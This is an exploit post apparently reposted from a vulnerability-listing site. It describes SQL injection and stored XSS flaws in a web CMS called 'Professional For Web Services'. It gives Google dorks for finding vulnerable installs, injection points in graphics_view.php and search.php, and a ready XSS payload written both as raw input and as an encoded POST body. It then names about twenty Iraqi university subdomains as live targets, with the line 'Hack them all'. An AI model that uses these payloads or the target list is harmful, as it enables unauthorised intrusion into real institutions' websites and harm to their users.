iraq Professional For Web Services Multiple Vulnerabilities

# Exploit Title: [iraq Professional For Web Services Multiple Vulnerabilities] # Google Dorks: [ intext:Powered by Professional For Web Services - بدعم من بروفشنال لخدمات المواقع ] # [ inurl:/graphics_view.php?details=] # Date: [1-8-2015] # Exploit Author: [R3NW4] # Platform: (WebApps) # Vendor Homepage [http://www.iraqiprof.com/] # Version: [All versions] # Tested on: [Linux(Debian)] # Greetz: MuhmadEmad - Razor X Blade - All Kurdish Hackers # the proffesionals has been exploited :D ----------------------- SQL injection: ( don't work in the higher Versions :( ) site.com/graphics_view.php?details=4 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '= 1 and active = 1' at line 1 ----------------------- SQLi From POST: goto: site.com/search.php and in search field just type: ' and we get: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 hack it with live http header :) ----------------------- Stored XSS go to /search.php and in search field type: "'/>><img src=x onerror=alert(/XSS_HERE/)> or send POST request to /search.php with this data: search=%22%27%2F%3E%3E%3Cimg+src%3Dx+onerror%3Dalert%28%2FXSS_Here%2F%29%3E&select=news&button=%D8%A7%D8%A8%D8%AD%D8%AB ------------------------ Demos: Hack them all :) http://cmed.tu.edu.iq/ http://cden.tu.edu.iq/ http://cpha.tu.edu.iq/ http://cnur.tu.edu.iq/ http://ceng.tu.edu.iq/ http://cpme.tu.edu.iq/ http://cape.tu.edu.iq/ http://cagr.tu.edu.iq/ http://csci.tu.edu.iq/ http://ccms.tu.edu.iq/ http://ciss.tu.edu.iq/ http://claw.tu.edu.iq/ http://cpos.tu.edu.iq/ http://cade.tu.edu.iq/ http://ceps.tu.edu.iq/ http://cedh.tu.edu.iq/ http://cphe.tu.edu.iq/ http://cedw.tu.edu.iq/ http://cbes.tu.edu.iq/ http://cedt.tu.edu.iq/ http://carts.tu.edu.iq/ more in google :D ------------------------- # this is kurdish hackerz revolution,Freedom For Kurdistan # https://twitter.com/R3NW4


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top